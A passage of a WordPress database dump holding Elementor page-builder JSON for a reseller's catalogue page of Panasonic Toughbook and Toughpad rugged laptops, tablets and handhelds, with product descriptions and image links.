,\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><\\/div><p>\\u00a0<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e2f59f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><\\/div><p>\\u00a0<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3395,2615,'_elementor_version','0.4'),(3401,2619,'_edit_lock','1545292015:1'),(3402,2619,'_edit_last','1'),(3419,2627,'_elementor_template_type','post'),(3420,2627,'_wp_page_template','template-fullwidth.php'),(3421,2627,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"justify\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e414452\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0318f25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07cdd64\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"730c08e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9a3b9cc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"ebdc4a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"cf2e3fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"375c2e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2a079e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a6cb494\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a926860\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faa365e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae37dad\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aca729e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"697550c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d0e7f24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ff2d0d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e2f59f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" 